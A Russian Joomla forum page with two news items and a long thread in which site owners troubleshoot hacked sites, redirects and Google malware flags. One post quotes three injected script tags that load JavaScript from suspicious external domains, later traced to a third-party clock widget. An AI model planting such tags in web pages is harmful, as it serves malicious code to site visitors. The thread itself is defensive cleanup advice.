Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 292310 Просмотров
*

Jiraff

  • Новичок
  • 6
  • 0 / 0
  • Вчера всё работало)
.htaccess смотрел?
Да в нём только строчка
Код
php_value memory_limit 128M
ещё нашёл с помощью файрбага что в начале страницы подгружаются скрипты вот такие:
Код
<script src="http://12aa7d99dd76180f9169daade0da799213.smotri-kino.pp.ua/?967553=9bz186fj7e7i6ujl8ryzsbE">
<script src="http://sea.waveview.info/uk//?767796=QAlHTVpXEkFBXVAJBFEHAg0NVQQZVwACBBkFBVEGGQ0MB1YZBAQGAQ0EAgxVDQZQ">
<script src="http://12aa7d99dd76180f9169daade0da799213.smotri-kino.pp.ua/?768491=n9aZmZ_NiYeEiICCj5jW2dvbzZ-ZmKCOktbS3dze3tjNnoKP1tuO2N3S0orbxojf3dvG2tqO2cbS09iJxtvb2d7S293TitLZj82ej4qfitaO29jbitjb28aI39jSxtrajtnG0tPYicbb29ne0tvd04rS2Y_NnIKPn4PW2tjd3c2DjoKMg5_W3N3T">
А в каком месте искать этот код в файлах я не знаю, может в шаблоне? не могу найти. Мне эти скрипты кажутся подозрительными...
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Опять гадят в джаваскрипты. Что на сайте стоит, и какой версии?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Jiraff
Замени на стандартный .htaccess и index.php в корне сайта.
А код ищи по маске, указанному как путь к яваскрипту, base64_decode
*

Jiraff

  • Новичок
  • 6
  • 0 / 0
  • Вчера всё работало)
Всем спасибо за помощь! Бяку нашёл. Все скрипты прописывались динамически их нигде так не найти было. Я уже грешил на то что обновление ставил и для Joomla самой и для модулей каких не помню, а оказалась дрянь в том на что даже и думать не думал. Устанавливал виджет с часами с сайта 101widgets.com вот он эту дрянь и генерировал. Виджет убрал, ничего не выскакивает. А он такой детский был, безобидный  :laugh: ребёнок у школьной доски где мелом время тикает (сайт у меня детской тематики)
Никогда не ставьте с него виджеты.
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
а еще лучше - вообще не ставить все эти прибамбасы))) часики, блин, курсы валют))) хех, тяжелое наследие юкоза
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Посоветуйте пожалуйста, что делать?
Наплевать. Слюной.

Это вообще опасно?
Разве что для психики бота.
*

Jiraff

  • Новичок
  • 6
  • 0 / 0
  • Вчера всё работало)
а еще лучше - вообще не ставить все эти прибамбасы))) часики, блин, курсы валют))) хех, тяжелое наследие юкоза
теперь точно ничего не буду ставить))
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Добрый день, кто подскажет, как можно найти редирект на сайте? Точнее его существование. Дело в том, что Google Adwords банит рекламу моего сайта в связи с вредоносным ПО. Первые разы действительно находили вирус. А последние разы ничего найти не можем, и сканером прогонял, скрипт слежения изменения файлов на крон повесил. Движок с нуля ставили. Ничего нет.

Если Google видит редирект, то как то же он его находит) Хотелось бы и мне найти, чтобы уже точно знать что где то засел вирус, и копать дальше
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Если Google видит редирект, то как то же он его находит)
ну думаю по принципу того как вы его искали
самое главное что редирект Google увидеть проще чем вам найти его в коде
просто повторно при поиске пропустили, есть много вариантов убрать его с глаз
один из них
записать далеко в право в файле а вы при открытии блокнотом нижний скроллинг не догадаетесь прокрутить и вуаля файл посмотрели а злой код не увидели
это как пример ну а остальное все интуитивно одинаково, ловкость рук и ни какого мошенничества

повторюсь сайт не чистится нажатием одной кнопки и каждый случай не похож, только если массово, но после массового взлома приходят остальные к открытой кормушке, и считать что у вас взлом как и у всех это ошибка, требуется все проверять и не думать что все почищено потому что кто то написал какие и где файлы и какие и где коды, нет у вас все может и даже не может а есть по другому, и даже на соседнем вашем же сайте все не так как тут, если этот принцип поймете то всегда дочистите все до конца

сайт надо тщательно вычищать и даже те кто умеет делают это 2-8 часов !важно даже они это делают зная где и что
и самое главное обновить все что требуется, либо отказаться от расширений в которых периодически находят уязвимости
ну а те кто не знает могут и пол года искать
« Последнее редактирование: 28.05.2013, 18:11:20 от flyingspook »
*

Tsvet

  • Новичок
  • 2
  • 0 / 0
У меня заразились все файлы .htaccess редиректом опять. Хотя я все файлы вычистила и поменяла пароли.
Подскажите, что делать?
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
записать далеко в право в файле а вы при открытии блокнотом нижний скроллинг не догадаетесь прокрутить и вуаля файл посмотрели а злой код не увидели
Скролил уже и вдоль и поперек


повторюсь сайт не чистится нажатием одной кнопки и каждый случай не похож, только если массово, но после массового взлома приходят остальные к открытой кормушке, и считать что у вас взлом как и у всех это ошибка, требуется все проверять и не думать что все почищено потому что кто то написал какие и где файлы и какие и где коды, нет у вас все может и даже не может а есть по другому, и даже на соседнем вашем же сайте все не так как тут, если этот принцип поймете то всегда дочистите все до конца

На быстрое решение вопроса не надеюсь. ПРи общении с поддержкой Google, они прислали адрес js файла, где  по их мнению сидит редирект. Файл как вчера чистый заливали на сайт, так он и не менялся. Сравнивал его с оригиналом из дистрибутива.  Нет там ниче.Сайт уже просканировал на все что можно, что отлавливал раньше, и на что жаловались форумчане.

При этом конечно я не исключаю, что где он сидит(
*

profi_spb

  • Новичок
  • 3
  • 0 / 0
У меня заразились все файлы .htaccess редиректом опять. Хотя я все файлы вычистила и поменяла пароли.
Подскажите, что делать?

Какая версия Joomla у Вас сейчас установлена?
*

profi_spb

  • Новичок
  • 3
  • 0 / 0
Скролил уже и вдоль и поперек


На быстрое решение вопроса не надеюсь. ПРи общении с поддержкой Google, они прислали адрес js файла, где  по их мнению сидит редирект. Файл как вчера чистый заливали на сайт, так он и не менялся. Сравнивал его с оригиналом из дистрибутива.  Нет там ниче.Сайт уже просканировал на все что можно, что отлавливал раньше, и на что жаловались форумчане.

При этом конечно я не исключаю, что где он сидит(

URL сайт пришлите.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
denn70
кроме адсенса, еще партнерки есть на сайте?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Google сам себя считает сомнительным сайтом))
либо вас еще не перепроверили либо есть что то в файлах, но может быть и ошибка Google такое бывает и не редко просто через время все нормализуется
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
denn70
кроме адсенса, еще партнерки есть на сайте?

У меня не адсенс, а adwords, т.е Google не хочет рекламировать сайт, из-за вируса
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Google сам себя считает сомнительным сайтом))
либо вас еще не перепроверили либо есть что то в файлах, но может быть и ошибка Google такое бывает и не редко просто через время все нормализуется


Я вот тоже про это и подумал, что может не актуальная инфа, но пишут, что проверили пару часов назад, и редирект о прежнему на сайте.
 Возьму отдельный хостинг для сайта, и заново склепаю, чтоб вообще никакой связи не было с этим аккаунтом, а то там еще с десяток сайтов, хоть и ничего не нашел на них.
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Какая версия Joomla у Вас сейчас установлена?

1.5.26 сейчас
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
1.5.26 сейчас
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас? Мой сайт изначально был сделан на версии 1.6 и ниче, как то обновился)
« Последнее редактирование: 28.05.2013, 21:58:03 от Alex Kop »
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас?
Когда захочется переделать полсайта с нуля - обязательно перейдут на последние версии. У меня несколько сайтов работает, и нормально если бы не эта вирусня в последнее время. Новые сайты, конечно, у же на других версиях делаются.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
у меня например 2.5.9 сейчас
обновить на 2.5.11 не про бывали ^-^
вы еще ссылку на сайт напишите к версии, и удача к вам неминуемо придет  ;)
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас? Мой сайт изначально был сделан на версии 1.6 и ниче, как то обновился)

Ну мой сайт изначально был сделан на голом HTML, (тогда еще 1.5 тока тока стал развиваться),  потом Joostina была, потом J1.5, и каждый раз это долбанный геморрой с переходом. Поэтому и 1.5 устраивала. НЕ было никакого желания перескакивать на 1.6, потом 2.5. Ради интереса обновляться как то не хотелось.

Ну а из-за ерунды с вирусом, вот перейду сразу на «последнюю актуальную версию»))))
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
обновить на 2.5.11 не про бывали ^-^
не пробовал, у меня в панели управления "версия Joomla! самая новая" 2.5.9
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас? Мой сайт изначально был сделан на версии 1.6 и ниче, как то обновился)
Тот, кто этого не понимает, просто слишком мало прожил и потому предельно наивен. Вот когда сделаешь свой первый сайт хотя бы на 10 тысяч страниц контента, каждый день будешь тратить по нескольку часов только на добавление нового и без вомзожности "остановить" сайта хотя бы на один-три дня, перепишешь "под себя" несколько десятков модулей и компонентов, я посмотрю, как ты будешь его "обновлять без проблем". Довести до ума безопасность уже имеющегося сайта получается на три порядка быстрее и проще.
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Тот, кто этого не понимает, просто слишком мало прожил и потому предельно наивен. Вот когда сделаешь свой первый сайт хотя бы на 10 тысяч страниц контента, каждый день будешь тратить по нескольку часов только на добавление нового и без вомзожности "остановить" сайта хотя бы на один-три дня, перепишешь "под себя" несколько десятков модулей и компонентов, я посмотрю, как ты будешь его "обновлять без проблем". Довести до ума безопасность уже имеющегося сайта получается на три порядка быстрее и проще.

Согласен, в пределах одной ветки развития, 1.5 или 2.5 обновляться норм. А вот с одного на другое проблемно, если много чего стороннего навешано было. Я вот сайт визитку два дня обновлял с 1,5 на 2.5. На 1.5 была стабильная связка компонентов, а на 2.5 nt;t самые компоненты дают той же стабильной связки)))
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
а что там за компоненты для сайта-визитки? насмешили))))
шаблон за полдня переделывается - и это с остановками на коньяк...
контент из базы в базу - 15 минут максимум, хотя какой там контент на сайте-визитке?)))
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Вот... А если еще и все шаблоны компонентов переписаны... Дали на лечение такой сайт. Печально мучался. Просто так не обновишь, верстка лезет.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
умников много кто думает за пол дня справиться  :laugh: я вас умоляю не смешите
или это такое название временное двух недель? а то и месяца? может отстал от сленга
или пиар такой?
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Давайте не будем ОФФТОПИТЬ
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Сейчас испытал несколько адреналинных секунд, пытаясь зайти в админку и тупо пялясь на сообщение: "403 Forbidden Доступ запрещен". Хотя сам сайт сам открывался. Потом допер глянуть папочку httpdocs/administrator/.. (слава богу c ftp было всё в  порядке). Вижу там самонародившийся htaccess с дружеским посылом:
Спойлер
[свернуть]
Думаю теперь всё же заняться составлением списка айпишек всех моих провайдеров..
А вот так, примерно, выглядел тот самый брутфорс (собственно, глядя на это порно, понимаешь -  насколько смешно банить отдельные ip)
Спойлер
[свернуть]
Так шо, ребята, держитесь! То ли ещё будет..
« Последнее редактирование: 02.06.2013, 23:41:36 от dormidont »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2520
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71450
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3501
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5114
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3522
Последний ответ 22.02.2022, 11:38:15
от AlexP750